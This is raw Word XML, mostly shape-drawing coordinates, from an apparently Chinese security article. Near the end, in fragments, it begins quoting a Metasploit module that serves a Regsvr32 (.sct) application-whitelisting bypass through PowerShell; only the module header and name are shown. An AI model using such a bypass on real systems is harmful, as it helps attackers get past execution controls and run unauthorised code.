,13699,3146,13700,3146,13702,3146,13704,3146,13706,3146,13707,3146,13709,3146,13711,3146,13713,3146,13716,3146,13718,3146,13720,3146,13722,3146,13725,3146,13727,3146,13730,3146,13732,3146,13735,3146,13738,3146,13741,3146,13743,3146,13746,3146,13749,3146,13752,3146,13756,3146,13759,3146,13762,3146,13766,3146,13769,3146,13773,3146,13776,3146,13780,3146,13784,3146,13788,3146,13792,3146,13796,3146,13800,3146,13804,3146,13808,3146,13813,3146,13817,3146,13822,3146,13827,3146,13831,3146,13836,3146,13841,3146,13846,3146,13851,3146,13857,3146,13862,3146,13867,3146,13873,3146,13879,3146,13884,3146,13890,3146,13896,3146,13902,3146,13908,3146,13915,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3145,13921,3144,13921,3144,13921,3144,13921,3144,13921,3144,13921,3144,13921,3143,13921,3143,13921,3143,13921,3143,13921,3143,13921,3142,13921,3142,13921,3142,13921,3141,13921,3141,13921,3141,13921,3140,13921,3140,13921,3140,13921,3139,13921,3139,13921,3138,13921,3138,13921,3137,13921,3137,13921,3136,13921,3136,13921,3135,13921,3134,13921,3134,13921,3133,13921,3132,13921,3132,13921,3131,13921,3130,13921,3129,13921,3129,13921,3128,13921,3127,13921,3126,13921,3125,13921,3124,13921,3123,13921,3122,13921,3121,13921,3120,13921,3119,13921,3118,13921,3117,13921,3116,13921,3114,13921,3113,13921,3112,13921,3110,13921,3109,13921,3108,13921,3106,13921,3105,13921,3103,13921,3102,13921,3100,13921,3099,13921,3097,13921,3095,13921,3094,13921,3092,13921,3090,13921,3088,13921,3086,13921,3084,13921,3083,13921,3081,13921,3079,13921,3076,13921,3074,13921,3072,13921,3070,13921,3068,13921,3065,13921,3063,13921,3061,13921,3058,13921,3056,13921,3053,13921,3051,13921,3048,13921,3045,13921,3043,13921,3040,13921,3037,13921,3034,13921,3031,13921,3029,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13921,3026,13920,3026,13920,3026,13920,3026,13920,3026,13920,3026,13920,3026,13919,3026,13919,3026,13919,3026,13919,3026,13918,3026,13918,3026,13918,3026,13917,3026,13917,3026,13917,3026,13916,3026,13916,3026,13915,3026,13915,3026,13914,3026,13913,3026,13913,3026,13912,3026,13911,3026,13911,3026,13910,3026,13909,3026,13908,3026,13907,3026,13906,3026,13905,3026,13904,3026,13903,3026,13902,3026,13901,3026,13900,3026,13898,3026,13897,3026,13896,3026,13894,3026,13893,3026,13891,3026,13890,3026,13888,3026,13887,3026,13885,3026,13883,3026,13881,3026,13879,3026,13877,3026,13875,3026,13873,3026,13871,3026,13869,3026,13867,3026,13865,3026,13862,3026,13860,3026,13857,3026,13855,3026,13852,3026,13849,3026,13846,3026,13843,3026,13841,3026,13838,3026,13834,3026,13831,3026,13828,3026,13825,3026,13821,3026,13818,3026,13814,3026,13811,3026,13807,3026,13803,3026,13799,3026,13795,3026,13791,3026,13787,3026,13783,3026,13779,3026,13774,3026,13770,3026,13765,3026,13760,3026,13756,3026,13751,3026,13746,3026,13741,3026,13736,3026,13730,3026,13725,3026,13720,3026,13714,3026,13708,3026,13703,3026,13697,3026,13691,3026,13685,3026,13679,3026,13672,3026,13666e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:156.500pt;margin-top:682.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3130,13650" coordsize="130,270">
        <v:shape style="position:absolute;left:3130;top:13650;width:130;height:270" coordorigin="3130,13650" coordsize="130,270" path="m3146,13666l3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3146,13666,3147,13666,3147,13666,3147,13666,3147,13666,3147,13666,3147,13666,3148,13666,3148,13666,3148,13666,3148,13666,3148,13666,3149,13666,3149,13666,3149,13666,3149,13666,3150,13666,3150,13666,3150,13666,3151,13666,3151,13666,3152,13666,3152,13666,3153,13666,3153,13666,3153,13666,3154,13666,3154,13666,3155,13666,3156,13666,3156,13666,3157,13666,3157,13666,3158,13666,3159,13666,3159,13666,3160,13666,3161,13666,3162,13666,3163,13666,3163,13666,3164,13666,3165,13666,3166,13666,3167,13666,3168,13666,3169,13666,3170,13666,3171,13666,3172,13666,3173,13666,3174,13666,3176,13666,3177,13666,3178,13666,3179,13666,3181,13666,3182,13666,3183,13666,3185,13666,3186,13666,3188,13666,3189,13666,3191,13666,3192,13666,3194,13666,3196,13666,3198,13666,3199,13666,3201,13666,3203,13666,3205,13666,3207,13666,3209,13666,3211,13666,3213,13666,3215,13666,3217,13666,3219,13666,3221,13666,3223,13666,3226,13666,3228,13666,3230,13666,3233,13666,3235,13666,3238,13666,3240,13666,3243,13666,3246,13666,3248,13666,3251,13666,3254,13666,3257,13666,3260,13666,3263,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13666,3266,13667,3266,13667,3266,13667,3266,13667,3266,13667,3266,13667,3266,13667,3266,13668,3266,13668,3266,13668,3266,13669,3266,13669,3266,13669,3266,13670,3266,13670,3266,13670,3266,13671,3266,13671,3266,13672,3266,13672,3266,13673,3266,13674,3266,13674,3266,13675,3266,13676,3266,13676,3266,13677,3266,13678,3266,13679,3266,13680,3266,13681,3266,13682,3266,13683,3266,13684,3266,13685,3266,13686,3266,13687,3266,13688,3266,13690,3266,13691,3266,13692,3266,13694,3266,13695,3266,13697,3266,13699,3266,13700,3266,13702,3266,13704,3266,13706,3266,13707,3266,13709,3266,13711,3266,13713,3266,13716,3266,13718,3266,13720,3266,13722,3266,13725,3266,13727,3266,13730,3266,13732,3266,13735,3266,13738,3266,13741,3266,13743,3266,13746,3266,13749,3266,13752,3266,13756,3266,13759,3266,13762,3266,13766,3266,13769,3266,13773,3266,13776,3266,13780,3266,13784,3266,13788,3266,13792,3266,13796,3266,13800,3266,13804,3266,13808,3266,13813,3266,13817,3266,13822,3266,13827,3266,13831,3266,13836,3266,13841,3266,13846,3266,13851,3266,13857,3266,13862,3266,13867,3266,13873,3266,13879,3266,13884,3266,13890,3266,13896,3266,13902,3266,13908,3266,13915,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3266,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3265,13921,3264,13921,3264,13921,3264,13921,3264,13921,3264,13921,3264,13921,3263,13921,3263,13921,3263,13921,3263,13921,3262,13921,3262,13921,3262,13921,3261,13921,3261,13921,3261,13921,3260,13921,3260,13921,3260,13921,3259,13921,3259,13921,3258,13921,3258,13921,3257,13921,3257,13921,3256,13921,3256,13921,3255,13921,3254,13921,3254,13921,3253,13921,3252,13921,3252,13921,3251,13921,3250,13921,3249,13921,3249,13921,3248,13921,3247,13921,3246,13921,3245,13921,3244,13921,3243,13921,3242,13921,3241,13921,3240,13921,3239,13921,3238,13921,3237,13921,3236,13921,3234,13921,3233,13921,3232,13921,3231,13921,3229,13921,3228,13921,3226,13921,3225,13921,3223,13921,3222,13921,3220,13921,3219,13921,3217,13921,3215,13921,3214,13921,3212,13921,3210,13921,3208,13921,3206,13921,3205,13921,3203,13921,3201,13921,3199,13921,3197,13921,3194,13921,3192,13921,3190,13921,3188,13921,3186,13921,3183,13921,3181,13921,3178,13921,3176,13921,3173,13921,3171,13921,3168,13921,3166,13921,3163,13921,3160,13921,3157,13921,3154,13921,3152,13921,3149,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13921,3146,13920,3146,13920,3146,13920,3146,13920,3146,13920,3146,13920,3146,13919,3146,13919,3146,13919,3146,13919,3146,13918,3146,13918,3146,13918,3146,13917,3146,13917,3146,13917,3146,13916,3146,13916,3146,13915,3146,13915,3146,13914,3146,13913,3146,13913,3146,13912,3146,13911,3146,13911,3146,13910,3146,13909,3146,13908,3146,13907,3146,13906,3146,13905,3146,13904,3146,13903,3146,13902,3146,13901,3146,13900,3146,13898,3146,13897,3146,13896,3146,13894,3146,13893,3146,13891,3146,13890,3146,13888,3146,13887,3146,13885,3146,13883,3146,13881,3146,13879,3146,13877,3146,13875,3146,13873,3146,13871,3146,13869,3146,13867,3146,13865,3146,13862,3146,13860,3146,13857,3146,13855,3146,13852,3146,13849,3146,13846,3146,13843,3146,13841,3146,13838,3146,13834,3146,13831,3146,13828,3146,13825,3146,13821,3146,13818,3146,13814,3146,13811,3146,13807,3146,13803,3146,13799,3146,13795,3146,13791,3146,13787,3146,13783,3146,13779,3146,13774,3146,13770,3146,13765,3146,13760,3146,13756,3146,13751,3146,13746,3146,13741,3146,13736,3146,13730,3146,13725,3146,13720,3146,13714,3146,13708,3146,13703,3146,13697,3146,13691,3146,13685,3146,13679,3146,13672,3146,13666e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:192.500pt;margin-top:713.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3850,14270" coordsize="130,270">
        <v:shape style="position:absolute;left:3850;top:14270;width:130;height:270" coordorigin="3850,14270" coordsize="130,270" path="m3866,14296l3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3866,14296,3867,14296,3867,14296,3867,14296,3867,14296,3867,14296,3867,14296,3867,14296,3867,14296,3868,14296,3868,14296,3868,14296,3868,14296,3868,14296,3869,14296,3869,14296,3869,14296,3869,14296,3870,14296,3870,14296,3870,14296,3871,14296,3871,14296,3871,14296,3872,14296,3872,14296,3872,14296,3873,14296,3873,14296,3874,14296,3874,14296,3875,14296,3875,14296,3876,14296,3877,14296,3877,14296,3878,14296,3878,14296,3879,14296,3880,14296,3881,14296,3881,14296,3882,14296,3883,14296,3884,14296,3885,14296,3886,14296,3886,14296,3887,14296,3888,14296,3889,14296,3890,14296,3891,14296,3893,14296,3894,14296,3895,14296,3896,14296,3897,14296,3898,14296,3900,14296,3901,14296,3902,14296,3904,14296,3905,14296,3907,14296,3908,14296,3910,14296,3911,14296,3913,14296,3914,14296,3916,14296,3918,14296,3920,14296,3921,14296,3923,14296,3925,14296,3927,14296,3929,14296,3931,14296,3933,14296,3935,14296,3937,14296,3939,14296,3942,14296,3944,14296,3946,14296,3948,14296,3951,14296,3953,14296,3956,14296,3958,14296,3961,14296,3963,14296,3966,14296,3969,14296,3972,14296,3974,14296,3977,14296,3980,14296,3983,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14297,3986,14297,3986,14297,3986,14297,3986,14297,3986,14297,3986,14297,3986,14297,3986,14298,3986,14298,3986,14298,3986,14298,3986,14299,3986,14299,3986,14299,3986,14300,3986,14300,3986,14300,3986,14301,3986,14301,3986,14302,3986,14302,3986,14303,3986,14303,3986,14304,3986,14305,3986,14305,3986,14306,3986,14307,3986,14307,3986,14308,3986,14309,3986,14310,3986,14311,3986,14312,3986,14313,3986,14314,3986,14315,3986,14316,3986,14317,3986,14319,3986,14320,3986,14321,3986,14323,3986,14324,3986,14326,3986,14327,3986,14329,3986,14331,3986,14332,3986,14334,3986,14336,3986,14338,3986,14340,3986,14342,3986,14344,3986,14346,3986,14348,3986,14350,3986,14353,3986,14355,3986,14358,3986,14360,3986,14363,3986,14365,3986,14368,3986,14371,3986,14374,3986,14377,3986,14380,3986,14383,3986,14386,3986,14389,3986,14392,3986,14396,3986,14399,3986,14403,3986,14407,3986,14410,3986,14414,3986,14418,3986,14422,3986,14426,3986,14430,3986,14434,3986,14439,3986,14443,3986,14448,3986,14452,3986,14457,3986,14462,3986,14467,3986,14471,3986,14477,3986,14482,3986,14487,3986,14492,3986,14498,3986,14503,3986,14509,3986,14515,3986,14521,3986,14526,3986,14533,3986,14539,3986,14545,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3985,14551,3985,14551,3985,14551,3985,14551,3985,14551,3985,14551,3985,14551,3985,14551,3984,14551,3984,14551,3984,14551,3984,14551,3984,14551,3983,14551,3983,14551,3983,14551,3983,14551,3982,14551,3982,14551,3982,14551,3981,14551,3981,14551,3981,14551,3980,14551,3980,14551,3980,14551,3979,14551,3979,14551,3978,14551,3978,14551,3977,14551,3977,14551,3976,14551,3975,14551,3975,14551,3974,14551,3973,14551,3973,14551,3972,14551,3971,14551,3971,14551,3970,14551,3969,14551,3968,14551,3967,14551,3966,14551,3966,14551,3965,14551,3964,14551,3963,14551,3962,14551,3961,14551,3959,14551,3958,14551,3957,14551,3956,14551,3955,14551,3953,14551,3952,14551,3951,14551,3950,14551,3948,14551,3947,14551,3945,14551,3944,14551,3942,14551,3941,14551,3939,14551,3937,14551,3936,14551,3934,14551,3932,14551,3931,14551,3929,14551,3927,14551,3925,14551,3923,14551,3921,14551,3919,14551,3917,14551,3915,14551,3913,14551,3910,14551,3908,14551,3906,14551,3904,14551,3901,14551,3899,14551,3896,14551,3894,14551,3891,14551,3889,14551,3886,14551,3883,14551,3880,14551,3878,14551,3875,14551,3872,14551,3869,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14551,3866,14550,3866,14550,3866,14550,3866,14550,3866,14550,3866,14549,3866,14549,3866,14549,3866,14549,3866,14548,3866,14548,3866,14548,3866,14547,3866,14547,3866,14546,3866,14546,3866,14545,3866,14545,3866,14544,3866,14544,3866,14543,3866,14542,3866,14542,3866,14541,3866,14540,3866,14539,3866,14538,3866,14538,3866,14537,3866,14536,3866,14535,3866,14534,3866,14532,3866,14531,3866,14530,3866,14529,3866,14527,3866,14526,3866,14525,3866,14523,3866,14522,3866,14520,3866,14519,3866,14517,3866,14515,3866,14513,3866,14512,3866,14510,3866,14508,3866,14506,3866,14504,3866,14502,3866,14499,3866,14497,3866,14495,3866,14492,3866,14490,3866,14487,3866,14485,3866,14482,3866,14479,3866,14477,3866,14474,3866,14471,3866,14468,3866,14465,3866,14462,3866,14458,3866,14455,3866,14452,3866,14448,3866,14445,3866,14441,3866,14437,3866,14433,3866,14430,3866,14426,3866,14422,3866,14417,3866,14413,3866,14409,3866,14404,3866,14400,3866,14395,3866,14391,3866,14386,3866,14381,3866,14376,3866,14371,3866,14366,3866,14361,3866,14355,3866,14350,3866,14344,3866,14339,3866,14333,3866,14327,3866,14321,3866,14315,3866,14309,3866,14303,3866,14296e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:198.500pt;margin-top:713.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3970,14270" coordsize="130,270">
        <v:shape style="position:absolute;left:3970;top:14270;width:130;height:270" coordorigin="3970,14270" coordsize="130,270" path="m3986,14296l3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3986,14296,3987,14296,3987,14296,3987,14296,3987,14296,3987,14296,3987,14296,3987,14296,3987,14296,3988,14296,3988,14296,3988,14296,3988,14296,3988,14296,3989,14296,3989,14296,3989,14296,3989,14296,3990,14296,3990,14296,3990,14296,3991,14296,3991,14296,3991,14296,3992,14296,3992,14296,3992,14296,3993,14296,3993,14296,3994,14296,3994,14296,3995,14296,3995,14296,3996,14296,3997,14296,3997,14296,3998,14296,3999,14296,3999,14296,4000,14296,4001,14296,4001,14296,4002,14296,4003,14296,4004,14296,4005,14296,4006,14296,4006,14296,4007,14296,4008,14296,4009,14296,4010,14296,4012,14296,4013,14296,4014,14296,4015,14296,4016,14296,4017,14296,4019,14296,4020,14296,4021,14296,4022,14296,4024,14296,4025,14296,4027,14296,4028,14296,4030,14296,4031,14296,4033,14296,4035,14296,4036,14296,4038,14296,4040,14296,4041,14296,4043,14296,4045,14296,4047,14296,4049,14296,4051,14296,4053,14296,4055,14296,4057,14296,4059,14296,4062,14296,4064,14296,4066,14296,4068,14296,4071,14296,4073,14296,4076,14296,4078,14296,4081,14296,4083,14296,4086,14296,4089,14296,4092,14296,4094,14296,4097,14296,4100,14296,4103,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14296,4106,14297,4106,14297,4106,14297,4106,14297,4106,14297,4106,14297,4106,14297,4106,14297,4106,14298,4106,14298,4106,14298,4106,14298,4106,14299,4106,14299,4106,14299,4106,14300,4106,14300,4106,14300,4106,14301,4106,14301,4106,14302,4106,14302,4106,14303,4106,14303,4106,14304,4106,14305,4106,14305,4106,14306,4106,14307,4106,14307,4106,14308,4106,14309,4106,14310,4106,14311,4106,14312,4106,14313,4106,14314,4106,14315,4106,14316,4106,14317,4106,14319,4106,14320,4106,14321,4106,14323,4106,14324,4106,14326,4106,14327,4106,14329,4106,14331,4106,14332,4106,14334,4106,14336,4106,14338,4106,14340,4106,14342,4106,14344,4106,14346,4106,14348,4106,14350,4106,14353,4106,14355,4106,14358,4106,14360,4106,14363,4106,14365,4106,14368,4106,14371,4106,14374,4106,14377,4106,14380,4106,14383,4106,14386,4106,14389,4106,14392,4106,14396,4106,14399,4106,14403,4106,14407,4106,14410,4106,14414,4106,14418,4106,14422,4106,14426,4106,14430,4106,14434,4106,14439,4106,14443,4106,14448,4106,14452,4106,14457,4106,14462,4106,14467,4106,14471,4106,14477,4106,14482,4106,14487,4106,14492,4106,14498,4106,14503,4106,14509,4106,14515,4106,14521,4106,14526,4106,14533,4106,14539,4106,14545,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4106,14551,4105,14551,4105,14551,4105,14551,4105,14551,4105,14551,4105,14551,4105,14551,4105,14551,4105,14551,4104,14551,4104,14551,4104,14551,4104,14551,4104,14551,4103,14551,4103,14551,4103,14551,4102,14551,4102,14551,4102,14551,4102,14551,4101,14551,4101,14551,4100,14551,4100,14551,4100,14551,4099,14551,4099,14551,4098,14551,4098,14551,4097,14551,4097,14551,4096,14551,4095,14551,4095,14551,4094,14551,4094,14551,4093,14551,4092,14551,4091,14551,4091,14551,4090,14551,4089,14551,4088,14551,4087,14551,4087,14551,4086,14551,4085,14551,4084,14551,4083,14551,4082,14551,4081,14551,4079,14551,4078,14551,4077,14551,4076,14551,4075,14551,4074,14551,4072,14551,4071,14551,4070,14551,4068,14551,4067,14551,4065,14551,4064,14551,4062,14551,4061,14551,4059,14551,4058,14551,4056,14551,4054,14551,4052,14551,4051,14551,4049,14551,4047,14551,4045,14551,4043,14551,4041,14551,4039,14551,4037,14551,4035,14551,4033,14551,4030,14551,4028,14551,4026,14551,4024,14551,4021,14551,4019,14551,4016,14551,4014,14551,4011,14551,4009,14551,4006,14551,4003,14551,4001,14551,3998,14551,3995,14551,3992,14551,3989,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14551,3986,14550,3986,14550,3986,14550,3986,14550,3986,14550,3986,14549,3986,14549,3986,14549,3986,14549,3986,14548,3986,14548,3986,14548,3986,14547,3986,14547,3986,14546,3986,14546,3986,14545,3986,14545,3986,14544,3986,14544,3986,14543,3986,14542,3986,14542,3986,14541,3986,14540,3986,14539,3986,14538,3986,14538,3986,14537,3986,14536,3986,14535,3986,14534,3986,14532,3986,14531,3986,14530,3986,14529,3986,14527,3986,14526,3986,14525,3986,14523,3986,14522,3986,14520,3986,14519,3986,14517,3986,14515,3986,14513,3986,14512,3986,14510,3986,14508,3986,14506,3986,14504,3986,14502,3986,14499,3986,14497,3986,14495,3986,14492,3986,14490,3986,14487,3986,14485,3986,14482,3986,14479,3986,14477,3986,14474,3986,14471,3986,14468,3986,14465,3986,14462,3986,14458,3986,14455,3986,14452,3986,14448,3986,14445,3986,14441,3986,14437,3986,14433,3986,14430,3986,14426,3986,14422,3986,14417,3986,14413,3986,14409,3986,14404,3986,14400,3986,14395,3986,14391,3986,14386,3986,14381,3986,14376,3986,14371,3986,14366,3986,14361,3986,14355,3986,14350,3986,14344,3986,14339,3986,14333,3986,14327,3986,14321,3986,14315,3986,14309,3986,14303,3986,14296e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:210.500pt;margin-top:713.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4210,14270" coordsize="130,270">
        <v:shape style="position:absolute;left:4210;top:14270;width:130;height:270" coordorigin="4210,14270" coordsize="130,270" path="m4226,14296l4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4226,14296,4227,14296,4227,14296,4227,14296,4227,14296,4227,14296,4227,14296,4227,14296,4227,14296,4227,14296,4228,14296,4228,14296,4228,14296,4228,14296,4228,14296,4228,14296,4229,14296,4229,14296,4229,14296,4229,14296,4230,14296,4230,14296,4230,14296,4231,14296,4231,14296,4231,14296,4232,14296,4232,14296,4233,14296,4233,14296,4234,14296,4234,14296,4235,14296,4235,14296,4236,14296,4236,14296,4237,14296,4237,14296,4238,14296,4239,14296,4239,14296,4240,14296,4241,14296,4242,14296,4242,14296,4243,14296,4244,14296,4245,14296,4246,14296,4247,14296,4248,14296,4249,14296,4250,14296,4251,14296,4252,14296,4253,14296,4254,14296,4255,14296,4256,14296,4257,14296,4259,14296,4260,14296,4261,14296,4263,14296,4264,14296,4265,14296,4267,14296,4268,14296,4270,14296,4271,14296,4273,14296,4275,14296,4276,14296,4278,14296,4280,14296,4282,14296,4283,14296,4285,14296,4287,14296,4289,14296,4291,14296,4293,14296,4295,14296,4297,14296,4300,14296,4302,14296,4304,14296,4306,14296,4309,14296,4311,14296,4313,14296,4316,14296,4318,14296,4321,14296,4324,14296,4326,14296,4329,14296,4332,14296,4334,14296,4337,14296,4340,14296,4343,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14296,4346,14297,4346,14297,4346,14297,4346,14297,4346,14297,4346,14297,4346,14297,4346,14297,4346,14298,4346,14298,4346,14298,4346,14298,4346,14299,4346,14299,4346,14299,4346,14300,4346,14300,4346,14300,4346,14301,4346,14301,4346,14302,4346,14302,4346,14303,4346,14303,4346,14304,4346,14305,4346,14305,4346,14306,4346,14307,4346,14307,4346,14308,4346,14309,4346,14310,4346,14311,4346,14312,4346,14313,4346,14314,4346,14315,4346,14316,4346,14317,4346,14319,4346,14320,4346,14321,4346,14323,4346,14324,4346,14326,4346,14327,4346,14329,4346,14331,4346,14332,4346,14334,4346,14336,4346,14338,4346,14340,4346,14342,4346,14344,4346,14346,4346,14348,4346,14350,4346,14353,4346,14355,4346,14358,4346,14360,4346,14363,4346,14365,4346,14368,4346,14371,4346,14374,4346,14377,4346,14380,4346,14383,4346,14386,4346,14389,4346,14392,4346,14396,4346,14399,4346,14403,4346,14407,4346,14410,4346,14414,4346,14418,4346,14422,4346,14426,4346,14430,4346,14434,4346,14439,4346,14443,4346,14448,4346,14452,4346,14457,4346,14462,4346,14467,4346,14471,4346,14477,4346,14482,4346,14487,4346,14492,4346,14498,4346,14503,4346,14509,4346,14515,4346,14521,4346,14526,4346,14533,4346,14539,4346,14545,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4346,14551,4345,14551,4345,14551,4345,14551,4345,14551,4345,14551,4345,14551,4345,14551,4344,14551,4344,14551,4344,14551,4344,14551,4344,14551,4343,14551,4343,14551,4343,14551,4343,14551,4342,14551,4342,14551,4342,14551,4341,14551,4341,14551,4341,14551,4340,14551,4340,14551,4339,14551,4339,14551,4338,14551,4338,14551,4337,14551,4337,14551,4336,14551,4336,14551,4335,14551,4334,14551,4334,14551,4333,14551,4332,14551,4332,14551,4331,14551,4330,14551,4329,14551,4328,14551,4328,14551,4327,14551,4326,14551,4325,14551,4324,14551,4323,14551,4322,14551,4321,14551,4320,14551,4318,14551,4317,14551,4316,14551,4315,14551,4314,14551,4312,14551,4311,14551,4310,14551,4308,14551,4307,14551,4305,14551,4304,14551,4302,14551,4301,14551,4299,14551,4298,14551,4296,14551,4294,14551,4292,14551,4291,14551,4289,14551,4287,14551,4285,14551,4283,14551,4281,14551,4279,14551,4277,14551,4275,14551,4273,14551,4271,14551,4268,14551,4266,14551,4264,14551,4261,14551,4259,14551,4256,14551,4254,14551,4251,14551,4249,14551,4246,14551,4243,14551,4241,14551,4238,14551,4235,14551,4232,14551,4229,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14551,4226,14550,4226,14550,4226,14550,4226,14550,4226,14550,4226,14549,4226,14549,4226,14549,4226,14549,4226,14548,4226,14548,4226,14548,4226,14547,4226,14547,4226,14546,4226,14546,4226,14545,4226,14545,4226,14544,4226,14544,4226,14543,4226,14542,4226,14542,4226,14541,4226,14540,4226,14539,4226,14538,4226,14538,4226,14537,4226,14536,4226,14535,4226,14534,4226,14532,4226,14531,4226,14530,4226,14529,4226,14527,4226,14526,4226,14525,4226,14523,4226,14522,4226,14520,4226,14519,4226,14517,4226,14515,4226,14513,4226,14512,4226,14510,4226,14508,4226,14506,4226,14504,4226,14502,4226,14499,4226,14497,4226,14495,4226,14492,4226,14490,4226,14487,4226,14485,4226,14482,4226,14479,4226,14477,4226,14474,4226,14471,4226,14468,4226,14465,4226,14462,4226,14458,4226,14455,4226,14452,4226,14448,4226,14445,4226,14441,4226,14437,4226,14433,4226,14430,4226,14426,4226,14422,4226,14417,4226,14413,4226,14409,4226,14404,4226,14400,4226,14395,4226,14391,4226,14386,4226,14381,4226,14376,4226,14371,4226,14366,4226,14361,4226,14355,4226,14350,4226,14344,4226,14339,4226,14333,4226,14327,4226,14321,4226,14315,4226,14309,4226,14303,4226,1429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附：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power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shell版Regsvr32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regsvr32_applocker_by</w:t>
      </w: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pass_server.rb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6e7f8f"/>
          <w:spacing w:val="1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>##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This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requires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Metasploit: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http://metasploit.com/download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14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source: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https://github.com/rapid7/metasploit‐framework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593" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="新宋体" w:hAnsi="新宋体" w:cs="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="7f7f7f"/>
          <w:spacing w:val="30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6e7f8f"/>
          <w:spacing w:val="40"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>##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class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MetasploitModule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&lt;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Msf::Exploit::Remote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31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Rank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ManualRanking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include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Msf::Exploit::Powershell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82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include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Msf::Exploit::Remote::HttpServer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def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initialize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info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{}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super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update_info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info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'Name'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'Regsvr32.exe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(.sct)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Application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Whitelisting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Bypass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Serve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2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>r'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'Description'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color w:val="404549"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>q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This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simplifies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Regsvr32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Application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Whitelisting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Bypa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technique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6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6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9.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,3530" coordsize="8990,390">
